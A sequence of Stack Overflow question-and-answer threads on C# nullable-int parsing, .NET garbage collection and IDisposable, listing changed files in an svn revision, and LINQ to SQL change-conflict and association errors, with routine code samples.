On a more serious note, try not to mix int, which is a C# keyword, with Int32, which is a .NET Framework BCL type - although it works, it just makes code look messy.
A: C# >= 7.1
var result = int.TryParse(foo, out var f) ? f : default(int?);
See C# language versioning to ascertain what language version your project supports
A: The following should work for any struct type. It is based on code by Matt Manela from the MSDN forums. As Murph points out, the exception handling could be expensive compared to using the type's dedicated TryParse method.
public static bool TryParseStruct<T>(this string value, out Nullable<T> result)
where T: struct
{
if (string.IsNullOrEmpty(value))
{
result = new Nullable<T>();
return true;
}
result = default(T);
try
{
IConvertible convertibleString = (IConvertible)value;
result = new Nullable<T>((T)convertibleString.ToType(typeof(T), System.Globalization.CultureInfo.CurrentCulture));
}
catch(InvalidCastException)
{
return false;
}
catch (FormatException)
{
return false;
}
return true;
}
These were the basic test cases I used.
string parseOne = "1";
int? resultOne;
bool successOne = parseOne.TryParseStruct<int>(out resultOne);
Assert.IsTrue(successOne);
Assert.AreEqual(1, resultOne);
string parseEmpty = string.Empty;
int? resultEmpty;
bool successEmpty = parseEmpty.TryParseStruct<int>(out resultEmpty);
Assert.IsTrue(successEmpty);
Assert.IsFalse(resultEmpty.HasValue);
string parseNull = null;
int? resultNull;
bool successNull = parseNull.TryParseStruct<int>(out resultNull);
Assert.IsTrue(successNull);
Assert.IsFalse(resultNull.HasValue);
string parseInvalid = "FooBar";
int? resultInvalid;
bool successInvalid = parseInvalid.TryParseStruct<int>(out resultInvalid);
Assert.IsFalse(successInvalid);
A: You can do this in one line, using the conditional operator and the fact that you can cast null to a nullable type (two lines, if you don't have a pre-existing int you can reuse for the output of TryParse):
Pre C#7:
int tempVal;
int? val = Int32.TryParse(stringVal, out tempVal) ? tempVal : (int?)null;
With C#7's updated syntax that allows you to declare an output variable in the method call, this gets even simpler.
int? val = Int32.TryParse(stringVal, out var tempVal) ? tempVal : (int?)null;
A:
I'm more interested in knowing if there is a built-in framework method that will parse directly into a nullable int?
There isn't.
A: This solution is generic without reflection overhead.
public static Nullable<T> ParseNullable<T>(string s, Func<string, T> parser) where T : struct
{
if (string.IsNullOrEmpty(s) || string.IsNullOrEmpty(s.Trim())) return null;
else return parser(s);
}
static void Main(string[] args)
{
Nullable<int> i = ParseNullable("-1", int.Parse);
Nullable<float> dt = ParseNullable("3.14", float.Parse);
}
A:
Glenn Slaven: I'm more interested in knowing if
there is a built-in framework method
that will parse directly into a
nullable int?
There is this approach that will parse directly to a nullable int (and not just int) if the value is valid like null or empty string, but does throw an exception for invalid values so you will need to catch the exception and return the default value for those situations:
public static T Parse<T>(object value)
{
try { return (T)System.ComponentModel.TypeDescriptor.GetConverter(typeof(T)).ConvertFrom(value.ToString()); }
catch { return default(T); }
}
This approach can still be used for non-nullable parses as well as nullable:
enum Fruit { Orange, Apple }
var res1 = Parse<Fruit>("Apple");
var res2 = Parse<Fruit?>("Banana");
var res3 = Parse<int?>("100") ?? 5; //use this for non-zero default
var res4 = Parse<Unit>("45%");
NB: There is an IsValid method on the converter you can use instead of capturing the exception (thrown exceptions do result in unnecessary overhead if they are expected). Unfortunately it only works since .NET 4, but there's still an issue where it doesn't check your locale when validating correct DateTime formats, see bug 93559.
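A sketch of that validation-first approach (assuming .NET 4+ as noted above):
var converter = System.ComponentModel.TypeDescriptor.GetConverter(typeof(int?));
// IsValid avoids the cost of a thrown-and-caught exception for bad input
int? value = converter.IsValid("100") ? (int?)converter.ConvertFrom("100") : null;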
A: Old topic, but how about:
public static int? ParseToNullableInt(this string value)
{
return String.IsNullOrEmpty(value) ? null : (int.Parse(value) as int?);
}
I like this better because, where the requirement is only to treat null/empty input as null, the TryParse version would not throw an error on e.g. ToNullableInt32(XXX), and that may introduce unwanted silent errors.
A: Try this:
public static int? ParseNullableInt(this string value)
{
int intValue;
if (int.TryParse(value, out intValue))
return intValue;
return null;
}
A: I found and adapted some code for a Generic NullableParser class. The full code is on my blog Nullable TryParse
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Globalization;
namespace SomeNamespace
{
/// <summary>
/// A parser for nullable types. Will return null when parsing fails.
/// </summary>
/// <typeparam name="T"></typeparam>
///
public static class NullableParser<T> where T : struct
{
public delegate bool TryParseDelegate(string s, out T result);
/// <summary>
/// A generic Nullable parser. Supports parsing of all types that implement the TryParse method.
/// </summary>
/// <param name="s">Text to be parsed</param>
/// <param name="result">Value is true for parse succeeded</param>
/// <returns>bool</returns>
public static bool TryParse(string s, out Nullable<T> result)
{
bool success = false;
try
{
if (string.IsNullOrEmpty(s))
{
result = null;
success = true;
}
else
{
IConvertible convertableString = s as IConvertible;
if (convertableString != null)
{
result = new Nullable<T>((T)convertableString.ToType(typeof(T),
CultureInfo.CurrentCulture));
success = true;
}
else
{
success = false;
result = null;
}
}
}
catch
{
success = false;
result = null;
}
return success;
}
}
}
A: I felt I should share mine which is a bit more generic.
Usage:
var result = "123".ParseBy(int.Parse);
var result2 = "123".ParseBy<int>(int.TryParse);
Solution:
public static class NullableParse
{
public static Nullable<T> ParseBy<T>(this string input, Func<string, T> parser)
where T : struct
{
try
{
return parser(input);
}
catch (Exception exc)
{
return null;
}
}
public delegate bool TryParseDelegate<T>(string input, out T result);
public static Nullable<T> ParseBy<T>(this string input, TryParseDelegate<T> parser)
where T : struct
{
T t;
if (parser(input, out t)) return t;
return null;
}
}
The first version is slower since it requires a try-catch, but it looks cleaner. If it won't be called many times with invalid strings, it is not that important.
If performance is an issue, please note that when using TryParse methods, you need to specify the type parameter of ParseBy as it cannot be inferred by the compiler. I also had to define a delegate, as the out keyword cannot be used within Func<>, but at least this time the compiler does not require an explicit instance.
Finally, you can use it with other structs as well, i.e. decimal, DateTime, Guid, etc.
A: public static void Main(string[] args)
{
var myString = "abc";
int? myInt = ParseOnlyInt(myString);
// null
myString = "1234";
myInt = ParseOnlyInt(myString);
// 1234
}
private static int? ParseOnlyInt(string s)
{
return int.TryParse(s, out var i) ? i : (int?)null;
}
A: The cleaner way would be to write a separate function or extension method, but if you just want a one-liner:
string s;
int? i = s == null ? (int?)null : int.Parse(s);
A: You should never use an exception if you don't have to - the overhead is horrible.
The variations on TryParse solve the problem - if you want to get creative (to make your code look more elegant) you could probably do something with an extension method in 3.5 but the code would be more or less the same.
A: Using delegates, the following code is able to provide reusability if you find yourself needing the nullable parsing for more than one structure type. I've shown both the .Parse() and .TryParse() versions here.
This is an example usage:
NullableParser.TryParseInt(ViewState["Id"] as string);
And here is the code that gets you there...
public class NullableParser
{
public delegate T ParseDelegate<T>(string input) where T : struct;
public delegate bool TryParseDelegate<T>(string input, out T outtie) where T : struct;
private static T? Parse<T>(string input, ParseDelegate<T> DelegateTheParse) where T : struct
{
if (string.IsNullOrEmpty(input)) return null;
return DelegateTheParse(input);
}
private static T? TryParse<T>(string input, TryParseDelegate<T> DelegateTheTryParse) where T : struct
{
T x;
if (DelegateTheTryParse(input, out x)) return x;
return null;
}
public static int? ParseInt(string input)
{
return Parse<int>(input, new ParseDelegate<int>(int.Parse));
}
public static int? TryParseInt(string input)
{
return TryParse<int>(input, new TryParseDelegate<int>(int.TryParse));
}
public static bool? TryParseBool(string input)
{
return TryParse<bool>(input, new TryParseDelegate<bool>(bool.TryParse));
}
public static DateTime? TryParseDateTime(string input)
{
return TryParse<DateTime>(input, new TryParseDelegate<DateTime>(DateTime.TryParse));
}
}
A: I realise this is an old topic, but can't you simply:
(Nullable<int>)int.Parse(stringVal);
?
A: I've come up with this one, which has satisfied my requirements (I wanted my extension method to emulate as close as possible the return of the framework's TryParse, but without try{} catch{} blocks and without the compiler complaining about inferring a nullable type within the framework method)
private static bool TryParseNullableInt(this string s, out int? result)
{
int i;
result = int.TryParse(s, out i) ? (int?)i : null;
return result != null;
}
A: I suggest the code below. You can work with the exception when a conversion error occurs.
public static class Utils {
public static bool TryParse<Tin, Tout>(this Tin obj, Func<Tin, Tout> onConvert, Action<Tout> onFill, Action<Exception> onError) {
Tout value = default(Tout);
bool ret = true;
try {
value = onConvert(obj);
}
catch (Exception exc) {
onError(exc);
ret = false;
}
if (ret)
onFill(value);
return ret;
}
public static bool TryParse(this string str, Action<int?> onFill, Action<Exception> onError) {
return Utils.TryParse(str
, s => string.IsNullOrEmpty(s) ? null : (int?)int.Parse(s)
, onFill
, onError);
}
public static bool TryParse(this string str, Action<int> onFill, Action<Exception> onError) {
return Utils.TryParse(str
, s => int.Parse(s)
, onFill
, onError);
}
}
Use this extension method in code (to fill the int? Age property of a Person class):
string ageStr = AgeTextBox.Text;
Utils.TryParse(ageStr, i => person.Age = i, exc => { MessageBox.Show(exc.Message); });
OR
AgeTextBox.Text.TryParse(i => person.Age = i, exc => { MessageBox.Show(exc.Message); });
| {
"language": "en",
"url": "https://stackoverflow.com/questions/45030",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "344"
} |
Q: Will the Garbage Collector call IDisposable.Dispose for me? The .NET IDisposable Pattern implies that if you write a finalizer, and implement IDisposable, that your finalizer needs to explicitly call Dispose.
This is logical, and is what I've always done in the rare situations where a finalizer is warranted.
However, what happens if I just do this:
class Foo : IDisposable
{
public void Dispose(){ CloseSomeHandle(); }
}
and don't implement a finalizer, or anything. Will the framework call the Dispose method for me?
Yes I realise this sounds dumb, and all logic implies that it won't, but I've always had 2 things at the back of my head which have made me unsure.
*
*Someone a few years ago once told me that it would in fact do this, and that person had a very solid track record of "knowing their stuff."
*The compiler/framework does other 'magic' things depending on what interfaces you implement (eg: foreach, extension methods, serialization based on attributes, etc), so it makes sense that this might be 'magic' too.
While I've read a lot of stuff about it, and there's been lots of things implied, I've never been able to find a definitive Yes or No answer to this question.
A: I want to emphasize Brian's point in his comment, because it is important.
Finalizers are not deterministic destructors like in C++. As others have pointed out, there is no guarantee of when it will be called, and indeed if you have enough memory, if it will ever be called.
But the bad thing about finalizers is that, as Brian said, it causes your object to survive a garbage collection. This can be bad. Why?
As you may or may not know, the GC is split into generations - Gen 0, 1 and 2, plus the Large Object Heap. Split is a loose term - you get one block of memory, but there are pointers to where the Gen 0 objects start and end.
The thought process is that you'll likely use lots of objects that will be short lived. So those should be easy and fast for the GC to get to - Gen 0 objects. So when there is memory pressure, the first thing it does is a Gen 0 collection.
Now, if that doesn't resolve enough pressure, then it goes back and does a Gen 1 sweep (redoing Gen 0), and then if still not enough, it does a Gen 2 sweep (redoing Gen 1 and Gen 0). So cleaning up long lived objects can take a while and be rather expensive (since your threads may be suspended during the operation).
This means that if you do something like this:
~MyClass() { }
Your object, no matter what, will live to Generation 2. This is because the GC has no way of calling the finalizer during garbage collection. So objects that have to be finalized are moved to a special queue to be cleaned out by a different thread (the finalizer thread - which if you kill makes all kinds of bad things happen). This means your objects hang around longer, and potentially force more garbage collections.
So, all of that is just to drive home the point that you want to use IDisposable to clean up resources whenever possible and seriously try to find ways around using the finalizer. It's in your application's best interests.
A: I don't think so. You have control over when Dispose is called, which means you could in theory write disposal code that makes assumptions about (for instance) the existence of other objects. You have no control over when the finalizer is called, so it would be iffy to have the finalizer automatically call Dispose on your behalf.
EDIT: I went away and tested, just to make sure:
class Program
{
static void Main(string[] args)
{
Fred f = new Fred();
f = null;
GC.Collect();
GC.WaitForPendingFinalizers();
Console.WriteLine("Fred's gone, and he's not coming back...");
Console.ReadLine();
}
}
class Fred : IDisposable
{
~Fred()
{
Console.WriteLine("Being finalized");
}
void IDisposable.Dispose()
{
Console.WriteLine("Being Disposed");
}
}
A: Not in the case you describe,
But the GC will call the Finalizer for you, if you have one.
HOWEVER: at the next garbage collection, instead of being collected, the object will go into the finalization queue; everything else gets collected, then its finalizer is called. The collection after that, it will be freed.
Depending on the memory pressure of your app, you may not have a GC for that object's generation for a while. So in the case of, say, a file stream or a DB connection, you may have to wait a while for the unmanaged resource to be freed in the finalizer call, causing some issues.
A: There's lots of good discussion already here, and I'm a little late to the party, but I wanted to add a few points myself.
*
*The garbage collector will never directly execute a Dispose method for you.
*The GC will execute finalizers when it feels like it.
*One common pattern that is used for objects that have a finalizer is to have it call a method which is by convention defined as Dispose(bool disposing) passing false to indicate that the call was made due to finalization rather than an explicit Dispose call.
*This is because it is not safe to make any assumptions about other managed objects while finalizing an object (they may have already been finalized).
class SomeObject : IDisposable {
IntPtr _SomeNativeHandle;
FileStream _SomeFileStream;
// Something useful here
~ SomeObject() {
Dispose(false);
}
public void Dispose() {
Dispose(true);
}
protected virtual void Dispose(bool disposing) {
if(disposing) {
GC.SuppressFinalize(this);
//Because the object was explicitly disposed, there will be no need to
//run the finalizer. Suppressing it reduces pressure on the GC
//The managed reference to an IDisposable is disposed only if this call came from Dispose(), not from the finalizer - other managed objects may already have been finalized
_SomeFileStream.Dispose();
}
//Regardless, clean up the native handle ourselves. Because it is simply a member
// of the current instance, the GC can't have done anything to it,
// and this is the only place to safely clean up
if(IntPtr.Zero != _SomeNativeHandle) {
NativeMethods.CloseHandle(_SomeNativeHandle);
_SomeNativeHandle = IntPtr.Zero;
}
}
}
That's the simple version, but there are a lot of nuances that can trip you up on this pattern.
*
*The contract for IDisposable.Dispose indicates that it must be safe to call multiple times (calling Dispose on an object that was already disposed should do nothing)
*It can get very complicated to properly manage an inheritance hierarchy of disposable objects, especially if different layers introduce new Disposable and unmanaged resources. In the pattern above Dispose(bool) is virtual to allow it to be overridden so that it can be managed, but I find it to be error-prone.
In my opinion, it is much better to completely avoid having any types that directly contain both disposable references and native resources that may require finalization. SafeHandles provide a very clean way of doing this by encapsulating native resources into disposables that internally provide their own finalization (along with a number of other benefits, like removing the window during P/Invoke where a native handle could be lost due to an asynchronous exception).
Simply defining a SafeHandle makes this trivial:
private class SomeSafeHandle
: SafeHandleZeroOrMinusOneIsInvalid {
public SomeSafeHandle()
: base(true)
{ }
protected override bool ReleaseHandle()
{ return NativeMethods.CloseHandle(handle); }
}
Allows you to simplify the containing type to:
class SomeObject : IDisposable {
SomeSafeHandle _SomeSafeHandle;
FileStream _SomeFileStream;
// Something useful here
public virtual void Dispose() {
_SomeSafeHandle.Dispose();
_SomeFileStream.Dispose();
}
}
A: The GC will not call dispose. It may call your finalizer, but even this isn't guaranteed under all circumstances.
See this article for a discussion of the best way to handle this.
A: The .Net Garbage Collector calls the Object.Finalize method of an object on garbage collection. By default this does nothing and must be overidden if you want to free additional resources.
Dispose is NOT automatically called and must be explicity called if resources are to be released, such as within a 'using' or 'try finally' block
see http://msdn.microsoft.com/en-us/library/system.object.finalize.aspx for more information
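For example, both of these guarantee Dispose runs even if an exception is thrown:
// 'using' compiles down to try/finally
using (var foo = new Foo())
{
    // work with foo
} // foo.Dispose() is called here

// the equivalent try/finally
Foo foo2 = new Foo();
try
{
    // work with foo2
}
finally
{
    if (foo2 != null) foo2.Dispose();
}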
A: No, it's not called.
But the using keyword makes it easy not to forget to dispose your objects.
I did the following test for this:
class Program
{
static void Main(string[] args)
{
Foo foo = new Foo();
foo = null;
Console.WriteLine("foo is null");
GC.Collect();
Console.WriteLine("GC Called");
Console.ReadLine();
}
}
class Foo : IDisposable
{
public void Dispose()
{
Console.WriteLine("Disposed!");
}
}
A: The documentation on IDisposable gives a pretty clear and detailed explanation of the behavior, as well as example code. The GC will NOT call the Dispose() method on the interface, but it will call the finalizer for your object.
A: The IDisposable pattern was created primarily to be called by the developer; if you have an object that implements IDisposable, the developer should either wrap its use in a using block or call the Dispose method directly.
The fail-safe for the pattern is to implement a finalizer that calls the Dispose() method. If you don't do that, you may create memory leaks, e.g. if you create some COM wrapper and never call System.Runtime.InteropServices.Marshal.ReleaseComObject(comObject) (which would be placed in the Dispose method).
There is no magic in the CLR to call Dispose methods automatically; the GC only tracks objects that have finalizers, stores them in the finalization table, and calls the finalizers when its cleanup heuristics kick in.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/45036",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "145"
} |
Q: How do you retrieve the commit message and file list for a particular revision? I need to deploy a few files that were checked in sometime ago (can't remember the exact ones), so I'm looking to get a list so I can deploy just those files. What is the svn command to do this?
A: @Dana & @John
Actually, svn log -v -r <#> http://my.svn.server/repository-root will work and show you all modified files within this repository. Or if you wanted this to work from within a working copy, you could use the output of svn info | grep "Repository Root" or something to find the actual repository root.
--verbose is the same as -v, and those options simply list all of the affected files.
A: svn log has a --verbose parameter. I don't have a repository here to test with, but does that return a list of modified files?
You can also use svn diff -r <revision> to retrieve the full change details, which you can parse or read manually to find out which files were changed.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/45042",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "11"
} |
Q: What can I do to resolve a "Row not found or changed" Exception in LINQ to SQL on a SQL Server Compact Edition Database? When executing SubmitChanges to the DataContext after updating a couple properties with a LINQ to SQL connection (against SQL Server Compact Edition) I get a "Row not found or changed." ChangeConflictException.
var ctx = new Data.MobileServerDataDataContext(Common.DatabasePath);
var deviceSessionRecord = ctx.Sessions.First(sess => sess.SessionRecId == args.DeviceSessionId);
deviceSessionRecord.IsActive = false;
deviceSessionRecord.Disconnected = DateTime.Now;
ctx.SubmitChanges();
The query generates the following SQL:
UPDATE [Sessions]
SET [Is_Active] = @p0, [Disconnected] = @p1
WHERE 0 = 1
-- @p0: Input Boolean (Size = 0; Prec = 0; Scale = 0) [False]
-- @p1: Input DateTime (Size = 0; Prec = 0; Scale = 0) [9/4/2008 5:12:02 PM]
-- Context: SqlProvider(SqlCE) Model: AttributedMetaModel Build: 3.5.21022.8
The obvious problem is the WHERE 0 = 1. After the record was loaded, I've confirmed that all the properties in the "deviceSessionRecord" are correct, including the primary key. Also, when catching the "ChangeConflictException" there is no additional information about why this failed. I've also confirmed that this exception gets thrown with exactly one record in the database (the record I'm attempting to update).
What's strange is that I have a very similar update statement in a different section of code and it generates the following SQL and does indeed update my SQL Server Compact Edition database.
UPDATE [Sessions]
SET [Is_Active] = @p4, [Disconnected] = @p5
WHERE ([Session_RecId] = @p0) AND ([App_RecId] = @p1) AND ([Is_Active] = 1) AND ([Established] = @p2) AND ([Disconnected] IS NULL) AND ([Member_Id] IS NULL) AND ([Company_Id] IS NULL) AND ([Site] IS NULL) AND (NOT ([Is_Device] = 1)) AND ([Machine_Name] = @p3)
-- @p0: Input Guid (Size = 0; Prec = 0; Scale = 0) [0fbbee53-cf4c-4643-9045-e0a284ad131b]
-- @p1: Input Guid (Size = 0; Prec = 0; Scale = 0) [7a174954-dd18-406e-833d-8da650207d3d]
-- @p2: Input DateTime (Size = 0; Prec = 0; Scale = 0) [9/4/2008 5:20:50 PM]
-- @p3: Input String (Size = 0; Prec = 0; Scale = 0) [CWMOBILEDEV]
-- @p4: Input Boolean (Size = 0; Prec = 0; Scale = 0) [False]
-- @p5: Input DateTime (Size = 0; Prec = 0; Scale = 0) [9/4/2008 5:20:52 PM]
-- Context: SqlProvider(SqlCE) Model: AttributedMetaModel Build: 3.5.21022.8
I have confirmed that the proper primary fields values have been identified in both the Database Schema and the DBML that generates the LINQ classes.
I guess this is almost a two part question:
*
*Why is the exception being thrown?
*After reviewing the second set of generated SQL, it seems like for detecting conflicts it would be nice to check all the fields, but I imagine this would be fairly inefficient. Is this the way this always works? Is there a setting to just check the primary key?
I've been fighting with this for the past two hours so any help would be appreciated.
A: I fixed this by adding (UpdateCheck = UpdateCheck.Never) to all [Column] definitions.
Does not feel like an appropriate solution, though. In my case it seems to be related to the fact that this table has an association to another table from where a row is deleted.
This is on Windows Phone 7.5.
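For reference, a minimal sketch of what that looks like on a hand-mapped column (using the Disconnected column from the question; names are placeholders):
[Column(Name = "Disconnected", UpdateCheck = UpdateCheck.Never)]
public DateTime? Disconnected { get; set; }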
A: This is what you need to handle this error in C# code:
try
{
_db.SubmitChanges(ConflictMode.ContinueOnConflict);
}
catch (ChangeConflictException e)
{
foreach (ObjectChangeConflict occ in _db.ChangeConflicts)
{
occ.Resolve(RefreshMode.KeepChanges);
}
}
A: I don't know if you've found any satisfactory answers to your question, but I posted a similar question and eventually answered it myself. It turned out that the NOCOUNT default connection option was turned on for the database, which caused a ChangeConflictException for every update made with LINQ to SQL. You can refer to my post here.
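If you suspect the same cause, here is a T-SQL sketch (assumes sysadmin rights; 512 is the NOCOUNT bit) for checking and clearing the server-wide default:
-- check whether NOCOUNT (512) is part of the default connection options
EXEC sp_configure 'user options';
-- clear all default connection options (including NOCOUNT), then apply
EXEC sp_configure 'user options', 0;
RECONFIGURE;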
A: First, it useful to know, what is causing the problem. Googling solution should help, you can log the details (table, column, old value, new value) about the conflict to find better solution for solving the conflict later:
public class ChangeConflictExceptionWithDetails : ChangeConflictException
{
public ChangeConflictExceptionWithDetails(ChangeConflictException inner, DataContext context)
: base(inner.Message + " " + GetChangeConflictExceptionDetailString(context))
{
}
/// <summary>
/// Code from following link
/// https://ittecture.wordpress.com/2008/10/17/tip-of-the-day-3/
/// </summary>
/// <param name="context"></param>
/// <returns></returns>
static string GetChangeConflictExceptionDetailString(DataContext context)
{
StringBuilder sb = new StringBuilder();
foreach (ObjectChangeConflict changeConflict in context.ChangeConflicts)
{
System.Data.Linq.Mapping.MetaTable metatable = context.Mapping.GetTable(changeConflict.Object.GetType());
sb.AppendFormat("Table name: {0}", metatable.TableName);
sb.AppendLine();
foreach (MemberChangeConflict col in changeConflict.MemberConflicts)
{
sb.AppendFormat("Column name : {0}", col.Member.Name);
sb.AppendLine();
sb.AppendFormat("Original value : {0}", col.OriginalValue.ToString());
sb.AppendLine();
sb.AppendFormat("Current value : {0}", col.CurrentValue.ToString());
sb.AppendLine();
sb.AppendFormat("Database value : {0}", col.DatabaseValue.ToString());
sb.AppendLine();
sb.AppendLine();
}
}
return sb.ToString();
}
}
Create a helper for wrapping your SubmitChanges:
public static class DataContextExtensions
{
public static void SubmitChangesWithDetailException(this DataContext dataContext)
{
try
{
dataContext.SubmitChanges();
}
catch (ChangeConflictException ex)
{
throw new ChangeConflictExceptionWithDetails(ex, dataContext);
}
}
}
And then call submit changes code:
Datamodel.SubmitChangesWithDetailException();
Finally, log the exception in your global exception handler:
protected void Application_Error(object sender, EventArgs e)
{
Exception ex = Server.GetLastError();
//TODO
}
A: That's nasty, but simple:
Check if the data types for all fields in the O/R-Designer match the data types in your SQL table.
Double check for nullable! A column should be either nullable in both the O/R-Designer and SQL, or not nullable in both.
For example, an NVARCHAR column "title" is marked as NULLable in your database, and contains the value NULL. Even though the column is marked as NOT NULLable in your O/R mapping, LINQ will load it successfully and set the column string to null.
*

*Now you change something and call SubmitChanges().
*LINQ will generate a SQL query containing "WHERE [title] IS NULL", to make sure the title has not been changed by someone else.
*LINQ looks up the properties of [title] in the mapping.
*LINQ will find [title] NOT NULLable.
*Since [title] is NOT NULLable, by logic it never could be NULL!
*So, optimizing the query, LINQ replaces it with "where 0 = 1", the SQL equivalent of "never".
The same symptom will appear when the data type of a field does not match the data type in SQL, or if fields are missing, since LINQ will not be able to make sure the SQL data has not changed since it was read.
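As a hedged illustration of what a matching mapping looks like, the title column from the example above should agree with the database on both type and nullability (the exact attribute values here are assumptions):
// NVARCHAR NULL in the database must map to CanBeNull = true here, otherwise
// the optimistic-concurrency WHERE clause degenerates as described above
[Column(Name = "title", DbType = "NVarChar(255)", CanBeNull = true)]
public string Title { get; set; }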
A: There is a method on DataContext called Refresh which may help here. It allows you to reload the database record before changes are submitted, and offers different modes to determine which values to keep. "KeepChanges" seems the smartest for my purposes; it is intended to merge my changes with any non-conflicting change that happened in the database in the meantime.
If I understand it correctly. :)
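A minimal sketch of that call (the entity and context names are assumed):
// reload the row from the database, but keep this client's pending edits
db.Refresh(RefreshMode.KeepChanges, employee);
db.SubmitChanges();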
A: This can also be caused by using more than one DbContext.
So for example:
protected async Task loginUser(string username)
{
using(var db = new Db())
{
var user = await db.Users
.SingleAsync(u => u.Username == username);
user.LastLogin = DateTime.UtcNow;
await db.SaveChangesAsync();
}
}
protected async Task doSomething(object obj)
{
string username = "joe";
using(var db = new Db())
{
var user = await db.Users
.SingleAsync(u => u.Username == username);
if (DateTime.UtcNow - user.LastLogin >
new TimeSpan(0, 30, 0)
)
await loginUser(username);
user.Something = obj;
await db.SaveChangesAsync();
}
}
This code will fail from time to time, in ways that seem unpredictable, because the user is used in both contexts, changed and saved in one, then saved in the other. The in-memory representation of the user who owns "Something" doesn't match what's in the database, and so you get this lurking bug.
One way to prevent this is to write any code that might ever be called as a library method in such a way that it takes an optional DbContext:
protected async Task loginUser(string username, Db _db = null)
{
await EFHelper.Using(_db, async db =>
{
var user = await db.Users...
... // Rest of loginUser code goes here
});
}
public class EFHelper
{
public static async Task Using<T>(T db, Func<T, Task> action)
where T : DbContext, new()
{
if (db == null)
{
using (db = new T())
{
await action(db);
}
}
else
{
await action(db);
}
}
}
So now your method takes an optional database, and if there isn't one, goes and makes one itself. If there is it just reuses what was passed in. The helper method makes it easy to reuse this pattern across your app.
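With that helper in place, the earlier doSomething could pass its own context down, so both methods see the same entity instance (a simplified sketch using the same assumed types):
protected async Task doSomething(object obj)
{
    string username = "joe";
    using (var db = new Db())
    {
        // share this context instead of letting loginUser open a second one
        await loginUser(username, db);
        var user = await db.Users.SingleAsync(u => u.Username == username);
        user.Something = obj;
        await db.SaveChangesAsync();
    }
}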
A: I solved this error by re-dragging the table from Server Explorer onto the designer and rebuilding.
A: In my case, the error was raised when two users having different LINQ-to-SQL data contexts updated the same entity in the same way. When the second user attempted the update, the copy they had in their data context was stale even though it was read after the first update had completed.
I discovered the explanation and solution in this article by Akshay Phadke: https://www.c-sharpcorner.com/article/overview-of-concurrency-in-linq-to-sql/
Here's the code I mostly lifted:
try
{
this.DC.SubmitChanges();
}
catch (ChangeConflictException)
{
this.DC.ChangeConflicts.ResolveAll(RefreshMode.OverwriteCurrentValues);
foreach (ObjectChangeConflict objectChangeConflict in this.DC.ChangeConflicts)
{
foreach (MemberChangeConflict memberChangeConflict in objectChangeConflict.MemberConflicts)
{
Debug.WriteLine("Property Name = " + memberChangeConflict.Member.Name);
Debug.WriteLine("Current Value = " + memberChangeConflict.CurrentValue.ToString());
Debug.WriteLine("Original Value = " + memberChangeConflict.OriginalValue.ToString());
Debug.WriteLine("Database Value = " + memberChangeConflict.DatabaseValue.ToString());
}
}
this.DC.SubmitChanges();
this.DC.Refresh(RefreshMode.OverwriteCurrentValues, att);
}
When I looked at my output window while debugging, I could see that the Current Value matched the Database Value. The "Original Value" was always the culprit. That was the value read by the data context before applying the update.
Thanks to MarceloBarbosa for the inspiration.
A: I know this question has long since been answered but here I have spent the last few hours banging my head against a wall and I just wanted to share my solution which turned out not to be related to any of the items in this thread:
Caching!
The select() part of my data object was using caching. When it came to updating the object a Row Not Found Or Changed error was cropping up.
Several of the answers did mention using different DataContext's and in retrospect this is probably what was happening but it didn't instantly lead me to think caching so hopefully this will help somebody!
A: I recently encountered this error, and found the problem was not with my Data Context, but with an update statement firing inside a trigger after Commit was being called on the Context.
The trigger was trying to update a non-nullable field with a null value, and it was causing the context to error out with the message mentioned above.
I'm adding this answer solely to help others dealing with this error and not finding a resolution in the answers above.
A: I have also got this error because of using two different contexts. I resolved this issue by using single data context.
A: In my case the problem was with the server-wide user options.
Following:
https://msdn.microsoft.com/en-us/library/ms190763.aspx
I enabled the NOCOUNT option in hope to get some performance benefits:
EXEC sys.sp_configure 'user options', 512;
RECONFIGURE;
and this turns out to break Linq's checks for the Affected Rows (as much as I can figure it out from .NET sources), leading to ChangeConflictException
Resetting the options to exclude the 512 bit fixed the problem.
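For reference, a sketch of the reset, assuming the 512 bit was the only user option set:
EXEC sys.sp_configure 'user options', 0;
RECONFIGURE;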
A: After employing qub1n's answer, I found that the issue for me was that I had inadvertently declared a database column to be decimal(18,0). I was assigning a decimal value, but the database was changing it, stripping the decimal portion. This resulted in the row changed issue.
Just adding this if anyone else runs into a similar issue.
A: I know this is an older post, but the issue can still be problematic today. I wanted to share my experience with this; as the solution for me was slightly different than the accepted answer. The accepted answer however did lead me to resolve my issue so thank you!
In my case, I had an update trigger that would auto-insert a row into a status history table anytime the status changed on a row in a table (SQL Server), based on a set of known codes. My history table had a NOT NULL constraint on the status ID column, and my INSERT statement didn't take into account that a previously unknown code might slip through, thereby causing the row insert to fail.
So the moral of the story is in addition to checking your data models, be sure to review any triggers you have defined as that too will result in a "row not found or changed" error.
Hope this helps someone else down the line; thanks all!
A: I had the same problem when inserting data and then wanting to modify or delete it in the same form. The solution I found was the following:
db.Refresh(System.Data.Linq.RefreshMode.KeepChanges, employee);
db is your connection (DataContext) variable, as you might imagine, and employee is the entity variable for the table you are updating.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/45045",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "103"
} |
Q: LINQ to SQL Association - "Properties do not have matching types" I am trying to link two fields of a given table to the same field in another table.
I have done this before so I can't work out what is wrong this time.
Anyway:
Table1
- Id (Primary)
- FK-Table2a (Nullable, foreign key relationship in DB to Table2.Id)
- FK-Table2b (Nullable, foreign key relationship in DB to Table2.Id)
Table2
- Id (Primary)
The association works for FK-Table2a but not FK-Table2b.
In fact, when I load into LINQ to SQL, it shows Table2.Id as associated to Table1.Id.
If I try and change this, or add a new association for FK-Table2b to Table2.Id it says: "Properties do not have matching types".
This also works in other projects - maybe I should just copy over the .dbml?
Any ideas?
A: I see this problem when I try to create one-to-one relationships where one side of the relationship is nullable (so really, one-to-zero/one). LINQ-to-SQL doesn't seem to support this so it appears we are forced to a plural relationship and a collection that will contain zero or one items. Annoying.
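One way to live with that limitation is to treat the generated collection as zero-or-one and unwrap it at the call site (names here are illustrative):
// the designer generated a collection, but the data guarantees 0..1 rows
var detail = person.PersonDetails.SingleOrDefault();
if (detail != null)
{
    // use detail
}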
A: No idea on the cause, but I just reconstructed my .dbml from scratch and it fixed itself.
Oh for a "refresh" feature...
